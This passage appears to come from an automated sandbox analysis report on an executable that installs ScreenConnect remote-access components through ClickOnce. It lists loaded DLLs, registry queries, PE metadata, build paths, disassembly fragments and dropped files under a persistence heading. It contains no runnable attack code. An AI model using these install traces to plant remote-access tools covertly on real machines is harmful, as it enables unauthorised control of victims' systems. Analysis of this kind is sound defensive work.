                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: wtsapi32.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: winsta.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: netapi32.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: wkscli.dll
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: 3coxOaV92n.exeStatic PE information: certificate valid
                  Source: 3coxOaV92n.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: 3coxOaV92n.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: 3coxOaV92n.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: 3coxOaV92n.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: 3coxOaV92n.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: 3coxOaV92n.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: 3coxOaV92n.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: 3coxOaV92n.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: dfsvc.exe, 00000001.00000002.2909498559.000002A1003C1000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A10023D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A100694000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2421902019.0000000002E32000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: 3coxOaV92n.exe
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.2909498559.000002A1003C1000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A100089000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000A.00000002.2420666021.0000000005142000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.WindowsClient.exe, 0000000C.00000002.3285857919.0000000002411000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.2474543224.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.2474342978.0000000001290000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.1.dr, ScreenConnect.ClientService.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbg\ source: dfsvc.exe, 00000001.00000002.2909498559.000002A100268000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A1005A4000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A1003C1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2423985826.000000001BE92000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 0000000A.00000000.2408865216.0000000000C6D000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.2909498559.000002A100268000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A1005A4000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A1003C1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2423985826.000000001BE92000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb] source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2403366409.0000000000C12000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2403366409.0000000000C12000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000001.00000002.2909498559.000002A1003C1000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A10023D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A100694000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2421902019.0000000002E32000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.2909498559.000002A1003C1000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A100085000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000A.00000002.2420807529.00000000051F2000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll0.1.dr
                  Source: 3coxOaV92n.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: 3coxOaV92n.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: 3coxOaV92n.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: 3coxOaV92n.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: 3coxOaV92n.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.drStatic PE information: 0xBC0F508C [Tue Dec 24 14:17:48 2069 UTC]
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeCode function: 0_2_00AC1000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00AC1000
                  Source: 3coxOaV92n.exeStatic PE information: real checksum: 0x212e6 should be: 0x1ebb8
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeCode function: 0_2_00AC1BC0 push ecx; ret 0_2_00AC1BD3
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848D6D2A5 pushad ; iretd 1_2_00007FF848D6D2A6
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848E87ABB push ss; retn 5F4Ch1_2_00007FF848E87B07
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848EA1BC0 pushfd ; retf 1_2_00007FF848EA5991
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848E8A538 push ebp; retn 5F49h1_2_00007FF848EB7A28
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848E87AA0 push ss; retn 5F4Ch1_2_00007FF848E87B07
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848EA4C6D push edx; retn 000Eh1_2_00007FF848EA4C6E
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848E800BD pushad ; iretd 1_2_00007FF848E800C1
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848E8843D push eax; ret 1_2_00007FF848E8846D
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF848E87569 push ebx; iretd 9_2_00007FF848E8756A
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeCode function: 10_2_02A77A8B push 8B03CA23h; iretd 10_2_02A77A95
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeCode function: 11_2_00DD83B3 push es; iretd 11_2_00DD83C2
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeCode function: 11_2_00DD83A3 push es; iretd 11_2_00DD83B2
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeCode function: 11_2_00DD8407 push es; iretd 11_2_00DD8412
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeCode function: 11_2_00DDE671 push 5D0803D0h; iretd 11_2_00DDE67E
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeCode function: 11_2_00DDE610 push 26E003D0h; iretd 11_2_00DDE65E
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeCode function: 11_2_00DDA623 pushfd ; iretd 11_2_00DDA641
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeCode function: 11_2_00DDA89F push ds; iretd 11_2_00DDA8BE
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeCode function: 11_2_00DDA88F push ds; iretd 11_2_00DDA89E
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeCode function: 11_2_00DDA9A1 push ss; iretd 11_2_00DDA9AE
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeCode function: 11_2_00DDCDEB pushfd ; iretd 11_2_00DDCDF9
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeCode function: 11_2_00DDCD13 pushad ; iretd 11_2_00DDCD22
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeCode function: 11_2_00DDCD23 pushad ; iretd 11_2_00DDCD32
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeCode function: 11_2_00DDCE0B push eax; iretw 11_2_00DDCE19
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeCode function: 11_2_00DDD069 push esp; iretd 11_2_00DDD076
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeCode function: 11_2_00DDD6F0 pushad ; iretd 11_2_00DDD6FE
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeCode function: 11_2_00DD97E0 push es; iretd 11_2_00DD97EE
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeCode function: 11_2_00DD9E1F push ss; iretd 11_2_00DD9E2A
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeCode function: 11_2_00DD9E2B push ss; iretd 11_2_00DD9E3A
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeCode function: 11_2_05351550 push esp; ret 11_2_05351563
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeCode function: 11_2_05350006 push esi; iretd 11_2_0535003E

                  Persistence and Installation Behavior

                  barindex
                  Creates files in the system32 config directory
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.ClientService.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f\ScreenConnect.Core.dllJump to dropped file
